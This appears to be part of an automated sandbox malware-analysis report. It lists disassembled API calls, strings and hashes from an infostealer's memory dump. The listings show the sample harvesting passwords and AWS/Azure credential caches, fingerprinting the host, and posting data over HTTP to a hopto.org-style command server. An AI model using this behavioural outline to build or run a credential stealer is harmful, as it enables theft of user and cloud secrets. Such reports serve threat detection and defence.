                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                                                                                      • String ID: passwords.txt
                                                                                                                                                                                                                      • API String ID: 1956182324-347816968
                                                                                                                                                                                                                      • Opcode ID: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
                                                                                                                                                                                                                      • Instruction ID: 9a12f6b0eacbcb2ed4cda68e664cf834d7366407d3e9ed4d657f0b87806d2d42
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2814032900208AFCF05FFA1EE4A9CD7B76BF08316F205026F501B31A1EB7A5E559B59
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                                                                                                                                                      • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404D83
                                                                                                                                                                                                                      • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00404DC7
                                                                                                                                                                                                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404DF5
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,00436953,",build_id,004377C4,------,004377B8,",hwid,004377A4,------), ref: 004050EE
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 00405101
                                                                                                                                                                                                                      • HttpSendRequestA.WININET(00000000,?,00000000), ref: 0040510F
                                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00405177
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 0040518E
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 0040519A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                                                                                                                      • String ID: "$"$------$------$------$8wA$build_id$hwid
                                                                                                                                                                                                                      • API String ID: 3006978581-858375883
                                                                                                                                                                                                                      • Opcode ID: 34a212d76a3bfc79e74cf83c5d1317f3bdb29bc58600130ec353d97f1a3d475c
                                                                                                                                                                                                                      • Instruction ID: 7219792e9a540e442724c4d24598c6325e7ae8fa207a63d5b21e459a2de286cb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34a212d76a3bfc79e74cf83c5d1317f3bdb29bc58600130ec353d97f1a3d475c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C002C371D5512A9ACF20EB21CD46ADDB7B5FF04308F4140E6A54873191DAB87ECA8FD8
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 00401696
                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004016BC
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004016E6
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00401705
                                                                                                                                                                                                                      • _time64.MSVCRT ref: 0040170E
                                                                                                                                                                                                                      • srand.MSVCRT ref: 00401715
                                                                                                                                                                                                                      • rand.MSVCRT ref: 0040171E
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0040172E
                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00401763
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00401771
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 004017BE
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 004017CF
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004017DB
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                                                                                                                                                                                      • String ID: %s%s$delays.tmp
                                                                                                                                                                                                                      • API String ID: 1620473967-1413376734
                                                                                                                                                                                                                      • Opcode ID: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
                                                                                                                                                                                                                      • Instruction ID: 11c0bd3ed3d7e6805384e8c578cb98533790a078e52b8311c5bcc7c05517a4c3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B41C8B1900218ABD7205F61AC4CF9F7B7DEB89715F1006BAF109E10A1DA354E54CF28
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 004164E2
                                                                                                                                                                                                                        • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416501
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,\.azure\), ref: 0041651E
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00416556
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 00416578
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,\.aws\), ref: 00416595
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00416229
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: DeleteFileA.KERNEL32(?), ref: 0041629D
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 004165CA
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 004165EC
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00416609
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0041663E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                                                                      • API String ID: 780282842-974132213
                                                                                                                                                                                                                      • Opcode ID: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
                                                                                                                                                                                                                      • Instruction ID: c1663bc4ae337e97e36098b0a6fa5269247debf2670cee4f463a309fb8bc2b96
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2741C671D4021C7BDB14EB61EC47FDD7378AB09308F5044AAB605B7090EAB9AB888F59
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 0040AC8A
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040AD94
                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0040AD9B
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,004373DC,00000000), ref: 0040AE4C
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,004373E0), ref: 0040AE74
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 0040AE98
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,004373E4), ref: 0040AEA4
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 0040AEAE
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,004373E8), ref: 0040AEBA
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 0040AEC4
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,004373EC), ref: 0040AED0
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 0040AEDA
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,004373F0), ref: 0040AEE6
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 0040AEF0
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,004373F4), ref: 0040AEFC
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 0040AF06
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,004373F8), ref: 0040AF12
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 0040AF1C
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,004373FC), ref: 0040AF28
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040AF7A
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040AF95
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040AFD8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1956182324-0
                                                                                                                                                                                                                      • Opcode ID: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
                                                                                                                                                                                                                      • Instruction ID: ea3aaa4254ea011307d5ff1151e45a3af1a32ea2cb92a891b43a4b7d07102f87
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E6C15D32904208AFDF15EFA1ED4A9DD7B76EF04309F20102AF501B30A1DB7A6E959F95
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                                                                                                                        • Part of subcall function 00410C53: RtlAllocateHeap.NTDLL(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                                                                                                                        • Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,0041858F), ref: 004170DD
                                                                                                                                                                                                                      • OpenEventA.KERNEL32(001F0003,00000000,?,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004170EC
                                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(?,00000000,004366DA), ref: 0041760A
                                                                                                                                                                                                                      • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176CB
                                                                                                                                                                                                                      • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176E4
                                                                                                                                                                                                                        • Part of subcall function 00404B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                                                                                                                                                        • Part of subcall function 00404B2E: StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                                                                                                                                                        • Part of subcall function 004139C2: StrCmpCA.SHLWAPI(?,block,?,?,00417744), ref: 004139D7
                                                                                                                                                                                                                        • Part of subcall function 004139C2: ExitProcess.KERNEL32 ref: 004139E2
                                                                                                                                                                                                                        • Part of subcall function 00405F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                                                                                                                                                        • Part of subcall function 00405F39: StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                                                                                                                                                        • Part of subcall function 00413198: strtok_s.MSVCRT ref: 004131B7
                                                                                                                                                                                                                        • Part of subcall function 00413198: strtok_s.MSVCRT ref: 0041323A
                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 00417A9A
                                                                                                                                                                                                                        • Part of subcall function 00405F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                                                                                                                                                        • Part of subcall function 00405F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                                                                                                                                                        • Part of subcall function 00405F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,0041858F), ref: 00417100
                                                                                                                                                                                                                        • Part of subcall function 0041257F: __EH_prolog3_catch_GS.LIBCMT ref: 00412589
                                                                                                                                                                                                                        • Part of subcall function 0041257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                                                                                                                                                                                        • Part of subcall function 0041257F: Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                                                                                                                                                                                        • Part of subcall function 0041257F: Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
                                                                                                                                                                                                                        • Part of subcall function 0041257F: StrCmpCA.SHLWAPI(?), ref: 004125DC
                                                                                                                                                                                                                        • Part of subcall function 0041257F: CloseHandle.KERNEL32(00000000), ref: 004125F0
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00418000
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocateConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
                                                                                                                                                                                                                      • String ID: .exe$.exe$433cd71b7a2bdd3668a493b00ee95630$_DEBUG.zip$cowod.$hopto$http://$org
                                                                                                                                                                                                                      • API String ID: 2665860859-3898869892
                                                                                                                                                                                                                      • Opcode ID: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
                                                                                                                                                                                                                      • Instruction ID: 6931a3cdf0a24aa58a91b10b9e7b8ba7caee6cf73e2bca90393059e53503fd57
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A89231715483419FC620FF26D94268EB7E1FF84308F51482FF58467191DBB8AA8D8B9B
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strtok_s.MSVCRT ref: 004135EA
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,true), ref: 004136AC
                                                                                                                                                                                                                        • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                                                                                                                        • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 0041376E
                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 0041379F
                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 004137DB
                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 00413817
                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 00413853
                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 0041388F
                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 004138CB
                                                                                                                                                                                                                      • strtok_s.MSVCRT ref: 0041398F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                                                                                                                                      • String ID: false$true
                                                                                                                                                                                                                      • API String ID: 2116072422-2658103896
                                                                                                                                                                                                                      • Opcode ID: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
                                                                                                                                                                                                                      • Instruction ID: c59aadfba82ba9961634352731141a8533392cfc76d17a14f51357a5b51db833
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5DB16DB5900218ABCF64EF55DC89ACA77B5BF18305F0001EAE549A7261EB75AFC4CF48
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00405285
                                                                                                                                                                                                                      • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?), ref: 004052C1
                                                                                                                                                                                                                      • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
